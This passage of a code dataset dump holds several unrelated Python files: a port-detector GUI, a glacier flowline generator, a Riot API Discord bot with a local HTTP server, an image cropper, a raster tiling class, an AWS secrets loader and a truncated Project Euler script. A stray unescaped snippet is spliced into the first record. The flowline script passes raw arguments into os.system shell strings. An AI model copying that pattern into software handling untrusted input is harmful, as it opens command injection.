def detect_status(self):\n        return self._detect_status\n\n    # detect_status setter\n    @detect_status.setter\n    def detect_status(self, value):\n        self._detect_status = value\n\n    # pc_version getter\n    @property\n    def pc_version(self):\n        return self._pc_version\n\n    # pc_version setter\n    @pc_version.setter\n    def pc_version(self, value):\n        self._pc_version = value\n\n    # url_download_link getter\n    @property\n    def url_download_link(self):\n        return self._url_download_link\n\n    # url_download_link setter\n    @url_download_link.setter\n    def url_download_link(self, value):\n        self._url_download_link = value\n\n    # online_version getter\n    @property\n    def online_version(self):\n        return self._online_version\n\n    # online_version setter\n    @online_version.setter\n    def online_version(self, value):\n        self._online_version = value\n\n\n
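sock_checker above relies on connect_ex, which returns 0 exactly when something accepts the connection. A standalone sketch of the same probe (the port number is illustrative):

# Returns True when a listener occupies the port; mirrors sock_checker's logic.
import socket

def port_in_use(port, host='localhost'):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        return sock.connect_ex((host, port)) == 0
    finally:
        sock.close()

print(port_in_use(5000))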
def main():\n    # if open.ini exists, delete it first, since it would confuse the port detector later\n    if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\open.ini\"):\n        os.remove(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\open.ini\")\n    # same for gui_open.ini: delete it first, since it would confuse the port detector later\n    if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\"):\n        os.remove(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\")\n\n    root = Tk()\n    global global_info\n    global_info = DetectGlobalInfo()\n\n    # read the config file\n    try:\n        config = configparser.ConfigParser()\n        config.read(\"C:\\Program Files\\Hyweb\\config.ini\")\n        global_info.default_ip = config.get('UCTP', 'ip').strip('\"')\n        global_info.default_port = config.get('UCTP', 'port').strip('\"')\n    except:\n        pass\n    app_gui = DetectGui(root, global_info)\n    root.mainloop()\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n","sub_path":"detect/detect_gui.py","file_name":"detect_gui.py","file_ext":"py","file_size_in_byte":32856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"64579886","text":"# #!/usr/bin/env python2.7\n\nimport numpy as np\nimport os\nfrom osgeo import ogr,osr\nfrom shapely.wkt import loads\nimport sys\n\nimport faulthandler\nfaulthandler.enable()\n\n\ndef FindStringBetweenSign(file,sign):\n\tvalue = file.split(sign)\n\treturn value\n\nif (len(sys.argv) > 1):\n\tseed_file = sys.argv[1]\n\tvx = sys.argv[2]\n\tvy = sys.argv[3]\n\toutshape = sys.argv[4]\n\n\tseedname = FindStringBetweenSign(seed_file,\"/\")[-1][:-4]\n\tvxname = FindStringBetweenSign(vx,\"/\")[-1][:-4]\n\tvyname = FindStringBetweenSign(vy,\"/\")[-1][:-4]\n\n\tds=ogr.Open(seed_file)\n\tlyr=ds.GetLayer()\n\tproj=lyr.GetSpatialRef()\n\tcoord_list = []\n\tfor feat in lyr:\n\t\tgeom = feat.GetGeometryRef()\n\t\tx,y=geom.GetX(), geom.GetY() #coord in map units\n\t\tcoord_list = np.append(coord_list,x)\n\t\tcoord_list = np.append(coord_list,y)\n\t#coord_list = coord_list.reshape(len(coord_list)/2,2)\n\tcoord_list = coord_list.reshape(-1, 2)\n\tseeds = np.sort(coord_list.view('float,float'), order=['f0'], axis=0).view(np.float)\n\tnp.savetxt(seedname+\".txt\",seeds,fmt='%s')\n\n\t#######generate flowlines\n\tif not os.path.exists(vxname+\".grd\"):\n\t\tos.system(\"gdalwarp \"+vx+\" -of netCDF \"+vxname+\".nc -tr 250 250 -r bilinear -overwrite\")\n\t\tos.system(\"gdalwarp \"+vy+\" -of netCDF \"+vyname+\".nc -tr 250 250 -r bilinear -overwrite\")\n\t\tos.system(\"gmt grdconvert \"+vxname+\".nc \"+vxname+\".grd\")\n\t\tos.system(\"gmt grdconvert \"+vyname+\".nc \"+vyname+\".grd\")\n\tos.system(\"./grd2stream \"+vxname+\".grd \"+vyname+\".grd -f \"+seedname+\".txt > grd2stream_out\")\n\t\n\tflowlines = np.genfromtxt(\"grd2stream_out\")\n\tbreak_list = np.where(np.isnan(flowlines[:,0]))[0]\n\tflowlines = np.delete(flowlines,break_list, axis=0)\n\tbreak_list_new = break_list-(np.arange(len(break_list)))\n\tbreak_list_new = np.delete(break_list_new, 0)\n\tflowlines_split = np.split(flowlines,break_list_new)\n\tprofile_list = []\n\tnew_i = 0\n\tfor i in np.arange(len(flowlines_split)):\n\t\tif len(flowlines_split[i])>1:\n\t\t\tnew_i = new_i+1\n\t\t\tline = ogr.Geometry(ogr.wkbLineString)\n\t\t\ttmplist = []\n\t\t\tfor j in np.arange(len(flowlines_split[i][:,0])):\n\t\t\t\tlx = flowlines_split[i][j][0]\n\t\t\t\tly = flowlines_split[i][j][1]\n\t\t\t\ttmplist.append(lx)\n\t\t\t\tline.AddPoint(lx,ly)\n\t\t\tif len(tmplist)>1:\n\t\t\t\tlineGeometry = ogr.CreateGeometryFromWkt(line.ExportToWkt())\n\t\t\t\tlineShapely = loads(line.ExportToWkt())\n\t\t\t\tprofile_list.append(lineShapely)\n\n\t####create output shapefile\n\tdest_srs = proj\n\toutShapefile = outshape\n\toutDriver = ogr.GetDriverByName('Esri Shapefile')\n\tif os.path.exists(outShapefile):\n\t\toutDriver.DeleteDataSource(outShapefile)\n\toutDataSource = outDriver.CreateDataSource(outShapefile)\n\tlayer = outDataSource.CreateLayer('', dest_srs, ogr.wkbLineString)\n\tlayer.CreateField(ogr.FieldDefn('id', ogr.OFTInteger))\n\tdefn = 
layer.GetLayerDefn()\n\tfor i in np.arange(len(profile_list)):\n\t\tfeat = ogr.Feature(defn)\n\t\tfeat.SetField('id', str(i+1))\n\t\tgeom = ogr.CreateGeometryFromWkb(profile_list[i].wkb)\n\t\tfeat.SetGeometry(geom)\n\t\tlayer.CreateFeature(feat)\n\t\tfeat = geom = None\n\toutDataSource = layer = feat = geom = None\nelse:\n\tprint(\"*** N.Neckel 2018 ***\")\n\tprint(\"*** Generate flowlines via grd2stream from point shapefile and output line shapefile ***\\n\")\n\tprint(\"usage: generate_flowlines.py input.shp vx.tif vy.tif output.shp\")\n\tprint(\"  input.shp   (input)  point shape file with seed points\")\n\tprint(\"  vx.tif      (input)  vx GeoTIFF file\")\n\tprint(\"  vy.tif      (input)  vy GeoTIFF file\")\n\tprint(\"  output.shp  (output) line shape file\")\n","sub_path":"flowlines/py_gmt_script/generate_flowlines.py","file_name":"generate_flowlines.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"154958135","text":"from discord.ext import commands\nfrom cassiopeia import baseriotapi\nfrom cassiopeia.type.api.exception import APIError\nimport os\nimport sys\nimport re\nfrom urllib.error import HTTPError\nfrom basecommand import BaseCommand\nimport json\n\nif \"RIOT_API_KEY\" not in os.environ:\n    print(\"\"\"Set your Riot API key as an environment variable\n          with the name RIOT_API_KEY\"\"\")\n    sys.exit(1)\n\nbaseriotapi.set_region(\"na\")\nbaseriotapi.set_api_key(os.environ[\"RIOT_API_KEY\"])\n\nclass DefaultIds:\n    SUMMONER = 62489081  # Tux\n    CHAMPION = 1  # Annie\n    ITEM = 3089  # Rabadon's Deathcap\n    MASTERY = 6121\n    RUNE = 5235\n    SUMMONER_SPELL = 4  # Flash\n    SHARD = \"na\"\n    QUEUE_TYPE = \"RANKED_SOLO_5x5\"\n    MATCH = 2215927421\n    SUMMONER_NAME = \"Riot Tuxedo\"\n\nclass CmdAPIRequest(BaseCommand):\n\n    def __init__(self, bot):\n        super().__init__(bot)\n        self.server = SimpleHTTPServer(\"127.0.0.1\", 9600)\n        self.server.start()\n\n\n    @commands.command(pass_context=True, help=\"Returns the default values\")\n    async def defaultParams(self, ctx):\n        message = \"Summoner-Id: \" + str(DefaultIds.SUMMONER) + \"\\n\"\n        message += \"Champion-Id: \" + str(DefaultIds.CHAMPION) + \"\\n\"\n        message += \"Item-Id: \" + str(DefaultIds.ITEM) + \"\\n\"\n        message += \"Mastery-Id: \" + str(DefaultIds.MASTERY) + \"\\n\"\n        message += \"Rune-Id: \" + str(DefaultIds.RUNE) + \"\\n\"\n        message += \"Summoner-Spell: \" + str(DefaultIds.SUMMONER_SPELL) + \"\\n\"\n        message += \"Shard: \" + str(DefaultIds.SHARD) + \"\\n\"\n        message += \"Queue-Type: \" + str(DefaultIds.QUEUE_TYPE) + \"\\n\"\n        message += \"Match-Id: \" + str(DefaultIds.MATCH) + \"\\n\"\n        message += \"Summoner-Name: \" + str(DefaultIds.SUMMONER_NAME) + \"\\n\"\n        await self.sendMessage(ctx, message, False)\n    \"\"\"\n    Command to request static data from the api.\n    Valid apis are listed in https://developer.riotgames.com/api/methods#!/1055/3629\n    E. g. champion or languages\n    This will send a message with a key to the data received and, if an id\n    was given, add the id & name of the object to the sent message.\n\n    @param api valid api as listed under lol-static-data\n    @param id  optional id of an element; ignored if\n               not required for the given api\n    \"\"\"\n    @commands.command(pass_context=True, pattern=re.compile(r'(?P<api>...) (?P<id>[0-9]+)'), help=\"This command sends a request to lol-static-data-v1.2. Valid names are: champion, item, language-strings, languages, map, mastery, realm, rune, summoner-spell and versions. If the second parameter is true default parameters will be submitted to the api for the {id} parameter (e. g. for name = champion the default {id} is 1. Therefore Annie's static data is returned.)\")\n    async def staticdata(self, ctx, api: str, withId: bool=False):\n        result = None\n        try:\n            result = self._callStaticData(api, withId)\n            message = self.server.addRecord(result)\n        except APIError as err:  # in case of 404/429 etc.\n            message = \"HTTP Error %s\" % err.error_code\n        except NoSuchMethodException:\n            message = \"Method not found!\"\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    def _callStaticData(self, api: str, withId: bool=False):\n        apiMethodName = \"get_\" + api.replace(\"-\", \"_\")\n        isApiWithId = api in [\"champion\", \"item\", \"mastery\", \"rune\", \"summoner-spell\"]\n        idMap = {\"champion\": DefaultIds.CHAMPION, \"item\": DefaultIds.ITEM, \"mastery\": DefaultIds.MASTERY, \"rune\": DefaultIds.RUNE, \"summoner-spell\": DefaultIds.SUMMONER_SPELL}\n        if isApiWithId and withId:\n            id = idMap[api]\n        isListApi = api in [\"languages\", \"versions\"]\n        # inconsistent in cassiopeia (map case)\n        if (isApiWithId and not withId) or api == \"map\":\n            apiMethodName = apiMethodName + \"s\"\n        if api == \"mastery\" and not withId:\n            apiMethodName = \"get_masteries\"\n\n        methodToCall = self._checkForMethod(apiMethodName)\n        if isApiWithId and withId:\n            result = methodToCall(id)\n        else:\n            result = methodToCall()\n        if isListApi:\n            result = json.dumps(result, ensure_ascii=False, indent=4)\n        else:\n            result = result.to_json()\n        return result\n\n    def _checkForMethod(self, apiMethodName):\n        if hasattr(baseriotapi, apiMethodName):\n            return getattr(baseriotapi, apiMethodName)\n        else:\n            raise NoSuchMethodException()\n\n    @commands.command(pass_context=True, pattern=re.compile(r'(?P<api>champion|score|topchampions) (?P<withChampionId>True|False)'), help=\"Sends a request to the championmastery api. Valid values for api are champion, score and topchampions. If withChampionId == True and the champion api is specified the championmastery data for Annie is returned. 
The default player is Riot Tuxedo.\")\n    async def championmastery(self, ctx, api: str, withChampionId: bool=False):\n        result = None\n        try:\n            if api == \"champion\" or api == \"topchampions\":\n                result = self._callChampionMastery(withChampionId)\n                message = self.server.addRecord(result)\n            elif api == \"score\":\n                result = self._championmasteryscore()\n                message = result\n        except APIError as err:  # in case of 404/429 etc.\n            message = \"HTTP Error %s\" % err.error_code\n        except NoSuchMethodException:\n            message = \"Method not found!\"\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    def _callChampionMastery(self, withChampionId: bool=False):\n        summonerId = DefaultIds.SUMMONER\n        if withChampionId:\n            championId = DefaultIds.CHAMPION\n        if not withChampionId:\n            api = \"get_champion_masteries\"\n        else:\n            api = \"get_champion_mastery\"\n        method = self._checkForMethod(api)\n        if not withChampionId:\n            result = method(summonerId)\n            # x.to_json() returns a string - thus the next json dump is not formatted properly\n            # => use internal __dict__ because there is no method to retrieve it otherwise\n            result = list(map(lambda x: x.__dict__, result))\n            result = json.dumps(result, ensure_ascii=False, indent=4)\n        else:\n            result = method(summonerId, championId)\n            result = result.to_json()\n        return result\n\n    def _championmasteryscore(self):\n        summonerId = DefaultIds.SUMMONER\n        result = baseriotapi.get_champion_mastery_score(summonerId)\n        #result = \"Mastery Score: %d\" % result\n        return result\n\n    @commands.command(pass_context=True, help=\"Requests the current-game-v1.0 data for Riot Tuxedo.\")\n    async def currentgame(self, ctx):\n        result = None  # ensure the name is bound even when the request fails\n        try:\n            result = baseriotapi.get_current_game(DefaultIds.SUMMONER)\n            if result is not None:\n                result = result.to_json()\n                message = self.server.addRecord(result)\n            else:\n                message = \"%s is currently not in a game.\" % DefaultIds.SUMMONER\n        except APIError as err:\n            message = \"HTTP Error: %s\" % err.error_code\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    @commands.command(pass_context=True, help=\"Returns data from the featured-games-v1.0 endpoint\")\n    async def featuredgames(self, ctx):\n        result = None  # ensure the name is bound even when the request fails\n        try:\n            result = baseriotapi.get_featured_games()\n            result = result.to_json()\n            message = self.server.addRecord(result)\n        except APIError as err:\n            message = \"HTTP Error: %s\" % err.error_code\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    @commands.command(pass_context=True, help=\"Returns recent games from the game-v1.3 endpoint for the default summoner.\")\n    async def game(self, ctx):\n        summonerId = DefaultIds.SUMMONER\n        result = None  # ensure the name is bound even when the request fails\n        try:\n            result = baseriotapi.get_recent_games(summonerId)\n            result = result.to_json()\n            message = self.server.addRecord(result)\n        except APIError as err:\n            message = \"HTTP Error: %s\" % err.error_code\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    # use freetoplay to see free-to-play champs, champion to see one champ and nothing to see all\n    @commands.command(pass_context=True, help=\"Returns data from the champion-v1.2 endpoint. Valid values for championOrFreeToPlay are freetoplay, champion and nothing. If champion is specified the data for the default champion is returned.\")\n    async def champion(self, ctx, championOrFreeToPlay: str=None):\n        if championOrFreeToPlay is not None:\n            championOrFreeToPlay = championOrFreeToPlay.lower()\n\n        if championOrFreeToPlay is None:\n            withChampionId = False\n            freeToPlay = False\n        elif championOrFreeToPlay == \"freetoplay\":\n            withChampionId = False\n            freeToPlay = True\n        elif championOrFreeToPlay == \"champion\":\n            withChampionId = True\n            freeToPlay = True\n        else:\n            withChampionId = False\n            freeToPlay = False\n\n        if withChampionId:\n            championId = DefaultIds.CHAMPION\n        else:\n            championId = None\n\n        result = None  # ensure the name is bound even when the request fails\n        try:\n            result = self._champion(championId, freeToPlay)\n            message = self.server.addRecord(result)\n        except APIError as err:\n            message = \"HTTP Error: %s\" % err.error_code\n        except NoSuchMethodException:\n            message = \"Method Not Found!\"\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    def _champion(self, championId: int=None, freeToPlay: bool=False):\n        if championId is None:\n            methodName = \"get_champion_statuses\"\n        else:\n            methodName = \"get_champion_status\"\n        method = self._checkForMethod(methodName)\n        if championId is None:\n            result = method(freeToPlay)\n            result = result.to_json()\n        else:\n            result = method(championId)\n            result = result.to_json()\n        return result\n\n    @commands.command(pass_context=True, help=\"Returns the status data from the lol-status-v1.0 endpoint. If forRegion is true the data for the NA shard is returned. \")\n    async def lolstatus(self, ctx, forRegion: bool=False):\n        result = None\n        try:\n            result = self._lolstatus(forRegion)\n            message = self.server.addRecord(result)\n        except APIError as err:\n            message = \"HTTP Error: %s\" % err.error_code\n        except NoSuchMethodException:\n            message = \"Method Not found!\"\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    def _lolstatus(self, forRegion: bool=False):\n        if forRegion:\n            # Note: Cassiopeia get_shard is bugged atm\n            result = baseriotapi.get_shards()\n        else:\n            result = baseriotapi.get_shard(DefaultIds.SHARD)\n        result = list(map(lambda x: x.__dict__, result))\n        result = json.dumps(result, ensure_ascii=False, indent=4)\n        return result\n\n    # defaults to challenger if invalid value\n    @commands.command(pass_context=True, help=\"This command returns the data from league-v2.5 for Challenger RANKED_SOLO_5x5\")\n    async def league(self, ctx):\n        result = None\n        try:\n            result = baseriotapi.get_challenger(DefaultIds.QUEUE_TYPE)\n            result = result.to_json()\n            message = self.server.addRecord(result)\n        except APIError as err:\n            message = \"HTTP Error: %s\" % err.error_code\n        except NoSuchMethodException:\n            message = \"Method Not found!\"\n\n        isResultNone = result is None\n        await self.sendMessage(ctx, message, isResultNone)\n\n    @commands.command(pass_context=True, help=\"Returns game data for a default match from the match-v2.2 endpoint. 
If includeTimeline is true the timeline is included (if returned from the api).\")\n async def match(self, ctx, includeTimeline: bool=False):\n result = None\n try:\n result = baseriotapi.get_match(DefaultIds.MATCH, includeTimeline)\n message = self.server.addRecord(result.to_json())\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None;\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Returns data from the matchlist endpoint for the default summoner.\")\n async def matchlist(self, ctx):\n result = None\n try:\n result = baseriotapi.get_match_list(DefaultIds.SUMMONER)\n message = self.server.addRecord(result.to_json())\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Requests ranked data from stats-v1.3 for the default summoner. If showSummary == True the summary is returned instead.\")\n async def stats(self, ctx, showSummary: bool=False):\n result = None\n try:\n if showSummary:\n result = baseriotapi.get_stats(DefaultIds.SUMMONER)\n else:\n result = baseriotapi.get_ranked_stats(DefaultIds.SUMMONER)\n message = self.server.addRecord(result.to_json())\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n # endpoints: None, by-name, masteries, name, runes\n @commands.command(pass_context=True, help=\"This command sends a request to the summoner endpoint. Valid endpoints are by-name, masteries, name, runes and None (leave empty)\")\n async def summoner(self, ctx, endpoint: str=None):\n result = None\n # TODO: Do NOT directly execute this!\n try:\n resultStr = self._summoner(endpoint)\n message = self.server.addRecord(resultStr)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n def _summoner(self, endpoint: str=None):\n returnStr = None\n if endpoint == \"masteries\":\n result = baseriotapi.get_summoner_masteries(DefaultIds.SUMMONER) # dict\n elif endpoint == \"name\":\n result = baseriotapi.get_summoner_names(DefaultIds.SUMMONER) # dict\n returnStr = json.dumps(result, ensure_ascii=False, indent=4)\n elif endpoint == \"runes\":\n result = baseriotapi.get_summoner_runes(DefaultIds.SUMMONER) # dict\n elif endpoint == \"by-name\":\n result = baseriotapi.get_summoners_by_name(DefaultIds.SUMMONER_NAME) # dict\n else:\n result = baseriotapi.get_summoners_by_id(DefaultIds.SUMMONER) # dict\n\n if returnStr is None:\n returnStr = self._createReturnStr(result)\n return returnStr\n\n def _createReturnStr(self, inputDict):\n returnStr = \"{\";\n for k, v in inputDict.items():\n returnStr += \"\\n\\\"\" + k + \"\\\": \" + v.to_json() + \",\"\n returnStr = returnStr[:-1]\n returnStr += \"\\n}\"\n return returnStr\n\nclass NoSuchMethodException(Exception):\n pass\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom socketserver import ThreadingMixIn\nimport threading\nimport argparse\nimport cgi\nimport hashlib\nimport random\nimport string\n\n# saves hash & data\nLocalData = {};\n# insert order of the hashes for removal (FIFO)\nInsertList = [];\n\nclass HTTPRequestHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n search = re.search(\"%.*%\", self.path)\n if search is not None :\n group0 = 
search.group(0)[1:-1]\n            if group0 in LocalData:\n                self.send_response(200)\n                self.send_header('Content-Type', 'application/json')\n                self.end_headers()\n                self.wfile.write(str.encode(LocalData[group0]))\n                return\n        self.send_response(404, 'Does not exist.')\n        self.send_header('Content-Type', 'application/json')\n        self.end_headers()\n        self.wfile.write(b\"404 - Not Found\")\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n    def shutdown(self):\n        self.socket.close()\n        HTTPServer.shutdown(self)\n\nclass SimpleHTTPServer():\n    def __init__(self, ip, port):\n        self.server = ThreadedHTTPServer((ip, port), HTTPRequestHandler)\n\n    def start(self):\n        self.server_thread = threading.Thread(target=self.server.serve_forever)\n        self.server_thread.daemon = True\n        self.server_thread.start()\n\n    def waitForThread(self):\n        self.server_thread.join()\n\n    def addRecord(self, data):\n        if len(LocalData) > 20:  # delete old ones if necessary\n            firstHash = InsertList.pop(0)  # pop the oldest hash (FIFO); pop() would drop the newest\n            del LocalData[firstHash]\n        randStr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))\n        LocalData[randStr] = data\n        InsertList.append(randStr)\n        return randStr\n\n    def stop(self):\n        self.server.shutdown()\n        self.waitForThread()\n","sub_path":"commands/requestapi.py","file_name":"requestapi.py","file_ext":"py","file_size_in_byte":17620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"486516396","text":"\"\"\"author: youngkun; date: 20180608; function: crop the black borders off photos\"\"\"\r\n\r\nimport cv2\r\nimport os\r\nimport datetime\r\n\r\n\r\ndef change_size(read_file):\r\n    binary_image = cv2.imread(read_file, 1)  # read the image; the file name is passed in by the caller\r\n    # img = cv2.medianBlur(img, 5)  # median filter to remove noise that may sit inside the black border\r\n    # b = cv2.threshold(img, 15, 255, cv2.THRESH_BINARY)  # tune the cropping result\r\n    # the decoded image has three channels; collapse it to a single channel before scanning pixels\r\n    binary_image = cv2.cvtColor(binary_image, cv2.COLOR_BGR2GRAY)\r\n    print(binary_image.shape)  # now single channel\r\n\r\n    x = binary_image.shape[0]\r\n    print(\"height x =\", x)\r\n    y = binary_image.shape[1]\r\n    print(\"width y =\", y)\r\n    edges_x = []\r\n    edges_y = []\r\n    for i in range(x):\r\n        for j in range(y):\r\n            if binary_image[i][j] != 255:\r\n                edges_x.append(i)\r\n                edges_y.append(j)\r\n\r\n    left = min(edges_x)  # first row that contains content\r\n    right = max(edges_x)  # last row that contains content\r\n    width = right - left  # number of content rows\r\n    bottom = min(edges_y)  # first content column\r\n    top = max(edges_y)  # last content column\r\n    height = top - bottom  # number of content columns\r\n\r\n    pre1_picture = binary_image[left:left + width, bottom:bottom + height]  # crop the image\r\n    return pre1_picture  # return the cropped image data\r\n\r\n\r\nsource_path = \"./cut_test/\"  # source image directory\r\nsave_path = \"./cut_test/\"  # directory where the cropped images are saved\r\n\r\nif not os.path.exists(save_path):\r\n    os.mkdir(save_path)\r\n\r\nfile_names = os.listdir(source_path)\r\n\r\nstarttime = datetime.datetime.now()\r\nfor i in range(len(file_names)):\r\n    x = change_size(source_path + file_names[i])  # crop one image\r\n    cv2.imwrite(save_path + file_names[i], x)\r\n    print(\"cropped:\", file_names[i])\r\n    print(\"count:\", i)\r\n    if i == 2600:  # stop after 2600 images\r\n        break\r\nprint(\"cropping finished\")\r\nendtime = datetime.datetime.now()  # record the end time\r\nendtime = (endtime - starttime).seconds\r\nprint(\"total cropping time:\", 
endtime)","sub_path":"Eve/black_border.py","file_name":"black_border.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"17537655","text":"import os\nimport logging\nfrom Queue import Queue\n\nfrom raster_processing.job import process_queue\nfrom raster_processing import resample, post_processing\nfrom raster_processing.utilities import file_utilities as file_util\nfrom tiles import run_tilestache, push_to_prod\n\n\nclass Layer(object):\n\n def __init__(self, kwargs):\n logging.debug('Starting layer class')\n\n self.debug = kwargs.debug\n self.threads = kwargs.threads\n self.layer_type = kwargs.layer\n\n self.region_list = kwargs.region\n self.year_list = kwargs.years\n self.world = kwargs.world\n\n self.tiles = kwargs.tiles\n self.is_test = kwargs.test\n self.is_staging = kwargs.staging\n\n self.root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n self.script_dir = os.path.join(self.root_dir, 'raster_processing', 'utilities')\n\n self.tiles_config_dir = os.path.join(self.root_dir, 'tiles', 'config', self.layer_type)\n self.tiles_output_dir = os.path.join(self.root_dir, 'tiles', 'output', self.layer_type)\n\n self.q = Queue()\n\n def build_job_queue(self):\n \n for region in self.region_list:\n region_dir = os.path.join(self.root_dir, 'data', self.layer_type, region)\n\n self.pre_process(region_dir)\n\n resample.resample_all(self.layer_type, region_dir, self.max_zoom_level, self.q)\n\n post_processing.post_process_all(self.layer_type, region_dir, self.script_dir, self.max_zoom_level, self.q)\n\n if self.tiles:\n\n tile_output_tiles_dir = os.path.join(self.tiles_output_dir, 'tiles')\n file_util.remove_all_files(tile_output_tiles_dir)\n\n run_tilestache.export_tiles(self.layer_type, region_dir, self.tiles_config_dir,\n self.max_world_level + 1, self.max_zoom_level, self.q, self.is_test,\n self.is_staging)\n \n if self.world:\n world_dir = os.path.join(self.root_dir, 'data', self.layer_type, 'world')\n post_processing.build_world_vrts(self.layer_type, world_dir, self.region_list,\n self.max_world_level, self.is_staging, self.q)\n\n if self.world and self.tiles:\n run_tilestache.export_tiles(self.layer_type, world_dir, self.tiles_config_dir, 0,\n self.max_world_level, self.q, self.is_test, self.is_staging)\n\n def process_jobs(self):\n\n process_queue(self.threads, self.q, self.debug)\n\n self.post_process()\n \n def push_to_s3(self):\n\n push_to_prod.push(self.tiles_output_dir, self.layer_type, self.is_test, self.is_staging)\n\n","sub_path":"layers/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225341337","text":"import logging, boto3\nfrom configparser import ConfigParser\nfrom pathlib import Path\nfrom botocore.exceptions import ClientError\n\nROOT_DIR = str(Path(__file__).parent.resolve().parents[0])\nlog = logging.getLogger(__name__)\n\ndef config(filename=ROOT_DIR+'/database.ini', section='postgresql-prod'):\n # create a parser\n parser = ConfigParser()\n db = {}\n\n try:\n # read config file\n with open(filename, 'r') as file:\n parser.read_file(file)\n # get section, default to postgresql\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = get_secret(param[1])\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n except FileNotFoundError as e:\n 
log.error(e)\n\n    return db\n\nsession = boto3.session.Session()\nclient = session.client(\n    service_name='secretsmanager',\n    region_name='us-east-1',\n)\n\ndef get_secret(secret_name):\n\n    text_secret_data = secret_name\n\n    try:\n        get_secret_value_response = client.get_secret_value(SecretId=secret_name)\n    except ClientError as e:\n        if e.response['Error']['Code'] == 'ResourceNotFoundException':\n            log.error(\"The requested secret -\" + secret_name + \"- was not found\")\n        elif e.response['Error']['Code'] == 'InvalidRequestException':\n            log.error(\"The request was invalid due to: %s\", e)\n        elif e.response['Error']['Code'] == 'InvalidParameterException':\n            log.error(\"The request had invalid params: %s\", e)\n        elif e.response['Error']['Code'] == 'DecryptionFailure':\n            log.error(\"The requested secret can't be decrypted using the provided KMS key: %s\", e)\n        elif e.response['Error']['Code'] == 'InternalServiceError':\n            log.error(\"An error occurred on the service side: %s\", e)\n    else:\n        # Success path: only runs when get_secret_value did not raise.\n        # Secrets Manager decrypts the secret value using the associated KMS CMK.\n        # Depending on whether the secret was a string or binary, only one of these fields will be populated.\n        if 'SecretString' in get_secret_value_response:\n            text_secret_data = get_secret_value_response['SecretString']\n        else:\n            binary_secret_data = get_secret_value_response['SecretBinary']\n\n    return text_secret_data\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.ERROR, format='%(asctime)s %(name)s %(levelname)s:%(message)s')\n    logger = logging.getLogger(__name__)\n    print(config())","sub_path":"user_producer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
{"seq_id":"311535784","text":"print('project euler problem 32')\n\nimport copy\n\ndef swap(arr, idx1, idx2):\n    arr[idx1], arr[idx2] = arr[idx2], arr[idx1]\n    return arr\n\ndef reverseSlice(arr, idx1, idx2):\n    sliced = arr[idx1:idx2+1]\n    prefix = arr[0:idx1]\n    reversedSlice = sliced[::-1]\n    return prefix + reversedSlice\n\ndef getNextPermutation(input):\n    ret = input[:]\n    for pivot in range(len(ret) - 2, -1, -1):\n        pivotValue = ret[pivot]\n        for i in range(len(ret) - 1, pivot, -1):\n            cur = ret[i]\n            if pivotValue < cur:\n                ret = swap(ret[:], i, pivot)\n                ret = reverseSlice(ret[:], pivot + 1, len(ret))\n                return ret\n    return ret\n\ntestBase = [1,2,3,4,5]\ntestSwap = copy.copy(testBase)\nres = swap(testSwap, 0,4)\ntestReverse = copy.copy(testBase)\nreverseRes = testReverse[::-1]\ntestSlice = testBase[:]\nsliced = testBase[2:4]\njoined = testBase[0:2] + testBase[2:5]\n\ndef getAllPerms(nextPerm):\n    allItems = [nextPerm]\n    while True:\n        prev = nextPerm\n        nextPerm = getNextPermutation(nextPerm[:])\n        if prev == nextPerm:\n            break\n        else:\n            allItems.append(nextPerm)\n    return allItems\n\nfirstPerm = [1,2,3,4,5,6,7,8,9]\nallPerms = getAllPerms(firstPerm)\n\ndef stringifyAndJoin(arr):\n    s = [str(i) for i in arr]\n    return int(\"\".join(s))\n\nprint('stringifyAndJoin [1,2,3]', stringifyAndJoin([1,2,3]))\n\nsummed = 0\nproducts = set()\nfor x in range(0, len(allPerms)):\n    # the product digits are perm[5:10]\n    perm = allPerms[x]\n    product = 